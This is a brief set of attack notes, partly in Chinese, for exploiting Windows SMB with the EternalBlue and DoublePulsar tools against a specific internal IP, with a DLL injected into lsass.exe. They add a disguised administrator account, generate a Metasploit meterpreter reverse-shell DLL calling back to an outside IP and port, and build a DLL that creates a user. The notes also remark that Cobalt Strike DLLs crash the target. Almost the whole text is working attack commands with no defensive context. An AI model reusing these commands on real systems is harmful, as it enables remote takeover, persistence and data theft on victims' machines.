Eternalblue-2.2.0.exe --InConfig Eternalblue-2.2.0.xml --TargetIp 192.168.10.188 --TargetPort 445 --Target WIN72K8R2
Doublepulsar-1.3.1.exe --InConfig Doublepulsar-1.3.1.xml --TargetIp 192.168.10.188 --TargetPort 445 --Protocol smb --Architecture x64 --Function RunDLL --DllPayload sf64.dll --payloadDllOrdinal 1 --ProcessName lsass.exe --ProcessCommandLine "" --NetworkTimeout 60


net user suppport_388945a0 1qaz@WSX /add&&net localgroup administrators suppport_388945a0 /add


上线msf
制作dll
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=39.102.47.112 LPORT=4888 -f dll -o ~/Desktop/on64.dll
msfvenom -p windows/adduser USER=admins PASS=zhenxishaonianshi -f dll > adduser.dll
双螺旋星加载这个dll

Cs生成的dll会打崩